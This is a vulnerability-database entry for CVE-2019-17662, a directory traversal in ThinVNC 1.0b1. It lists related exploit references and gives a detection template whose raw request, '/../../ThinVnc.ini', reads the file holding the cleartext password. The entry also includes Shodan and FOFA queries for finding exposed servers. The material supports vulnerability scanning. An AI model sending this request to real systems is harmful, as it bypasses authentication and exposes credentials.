| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
| ThinVNC 1.0b1 - Authentication Bypass Exploit | 17 Oct 201900:00 | – | zdt | |
| Exploit for Deserialization of Untrusted Data in Redhat Jboss_Enterprise_Application_Platform | 8 Dec 202020:38 | – | gitee | |
| Exploit for Deserialization of Untrusted Data in Redhat Jboss_Enterprise_Application_Platform | 6 May 202015:20 | – | gitee | |
| Exploit for Path Traversal in Cybelsoft Thinvnc | 18 Oct 202108:26 | – | githubexploit | |
| Exploit for Path Traversal in Cybelsoft Thinvnc | 31 Aug 202119:30 | – | githubexploit | |
| CVE-2019-17662 | 17 Oct 201900:00 | – | circl | |
| Cybelsoft ThinVNC Directory Traversal (CVE-2019-17662) | 2 Oct 202200:00 | – | checkpoint_advisories | |
| CVE-2019-17662 | 16 Oct 201917:24 | – | cve | |
| CVE-2019-17662 | 16 Oct 201917:24 | – | cvelist | |
| ThinVNC 1.0b1 - Authentication Bypass | 17 Oct 201900:00 | – | exploitdb |
id: CVE-2019-17662
info:
name: ThinVNC 1.0b1 - Authentication Bypass
author: DhiyaneshDK
severity: critical
description: |
ThinVNC 1.0b1 is vulnerable to arbitrary file read, which leads to a compromise of the VNC server. The vulnerability exists even when authentication is turned on during the deployment of the VNC server. The password for authentication is stored in cleartext in a file that can be read via a ../../ThinVnc.ini directory traversal attack vector.
impact: |
An attacker can bypass authentication and gain unauthorized access to the ThinVNC application.
remediation: |
Upgrade to a patched version of ThinVNC or implement additional authentication mechanisms.
reference:
- http://packetstormsecurity.com/files/154896/ThinVNC-1.0b1-Authentication-Bypass.html
- https://github.com/bewest/thinvnc/issues/5
- https://redteamzone.com/ThinVNC/
- https://github.com/shashankmangal2/Exploits/blob/master/ThinVNC-RemoteAccess/POC.py
- https://github.com/YIXINSHUWU/Penetration_Testing_POC
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2019-17662
cwe-id: CWE-22
epss-score: 0.96758
epss-percentile: 0.99879
cpe: cpe:2.3:a:cybelsoft:thinvnc:1.0:b1:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: cybelsoft
product: thinvnc
shodan-query: http.favicon.hash:-1414548363
fofa-query: icon_hash=-1414548363
tags: cve,cve2019,packetstorm,auth-bypass,thinvnc,intrusive,cybelsoft,vuln
http:
- raw:
- |
GET /{{randstr}}/../../ThinVnc.ini HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "User="
- "Password="
condition: and
- type: word
part: header
words:
- "application/binary"
- type: status
status:
- 200
# digest: 4a0a00473045022100b765df800ac9df94a7603bdcc6aaab7c59ab56e50de7dd144f945533fd6e96d802207565630e886faa5eb3134c656cb2b9d8decfb78adef566e4e66d0576063869d3:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation